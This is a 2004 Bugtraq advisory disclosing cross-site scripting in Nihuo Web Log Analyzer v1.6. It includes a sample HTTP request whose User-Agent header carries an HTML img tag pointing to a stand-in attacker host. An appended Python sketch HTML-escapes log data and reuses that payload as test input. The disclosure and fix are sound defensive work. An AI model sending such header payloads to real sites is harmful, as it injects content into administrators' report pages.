Message-ID: <20040820192529.10833.qmail@www.securityfocus.com>
Date: 20 Aug 2004 19:25:29 -0000
From: Audun Larsen <larsen@...s.com>
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer




---------------------------------------------------------------------------
          Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer
---------------------------------------------------------------------------
Author:		Audun Larsen (larsen at xqus dot com)
Date:		Aug 20, 2004


Affected software:
==================
Name:		Nihuo Web Log Analyzer
URL:		http://www.loganalyzer.net/index.html
Version:	v1.6 (older versions not tested)
Released:	Feb 17, 2004


Vendor's description:
=====================
Nihuo Web Log Analyzer can generate a wide range of reports and statistics from your log file - more than 80 different reports with 2D and 3D graphs.


Introduction:
=============
Most developers know that input validation is important. If you look at the history of PHP-nuke you can see that software that does not check user input thoroughly is insecure.


Discussion:
===========
Many think that HTTP access-log analyzers don't get any input from the user.
But think about it: both the User-Agent and the Referer header are data that can be manipulated by the user.
Nihuo Web Log Analyzer is vulnerable to just this type of attack.


Exploit:
========
To exploit Nihuo Web Log Analyzer we have to send a special HTTP request that includes malicious code.

GET / HTTP/1.1
Host: sample.com
Connection: close
Accept: text/plain
Accept-Language: en-us,en
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Some-Fake-UA <img src='http://attacker.host.com/app.gif'>

Generating this HTTP request can easily be done in Perl, PHP or any other language. Generating enough hits with this user-agent will cause the user-agent to appear in the "Top Browsers" list, with the HTML code included. Notice that single quotes are used in the User-Agent.


Tested with:
============
Apache 1.3.x
Nihuo Web Log Analyzer v1.6 (Running on Win2k)


Solution:
=========
No solution available at the time of writing.
Vendor notified Aug 20, 2004.
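
Added example (not part of the original advisory and not Nihuo's code): a minimal Python sketch of the fix class for a log-report generator, which HTML-encodes every log-derived value before it is written into the "Top Browsers" table. The log lines are constructed, and the function names and the Apache "combined" log format are assumptions.

```python
import html
import re
from collections import Counter

# Apache "combined" log line; the last two quoted fields are client-supplied.
COMBINED = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?:[^"\\]|\\.)*" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log; the hostile agent string is the one in the advisory.
HOSTILE = "Some-Fake-UA <img src='http://attacker.host.com/app.gif'>"
SAMPLE_LOG = (
    ['192.0.2.7 - - [20/Aug/2004:19:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "%s"' % HOSTILE] * 3
    + ['192.0.2.9 - - [20/Aug/2004:19:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"'] * 2
    + ['not a combined-format line']
)


def top_agents(lines, limit=10):
    """Count User-Agent values; unparseable lines are skipped."""
    counts = Counter()
    for line in lines:
        m = COMBINED.match(line)
        if m:
            counts[m.group("agent")] += 1
    return counts.most_common(limit)


def render_top_browsers(rows):
    """Build the report table, encoding every log-derived value for HTML."""
    out = ["<table>", "<tr><th>Browser</th><th>Hits</th></tr>"]
    for agent, hits in rows:
        # quote=True also encodes ' and ", so the value stays inert even if
        # a template later places it inside an attribute.
        out.append("<tr><td>%s</td><td>%d</td></tr>"
                   % (html.escape(agent, quote=True), hits))
    out.append("</table>")
    return "\n".join(out)


if __name__ == "__main__":
    print(render_top_browsers(top_agents(SAMPLE_LOG)))
```

The same encoding applies to the Referer field and to any other request data that ends up in a report.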


Disclaimer: 
===========
The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Copyright © 2004 Audun Larsen

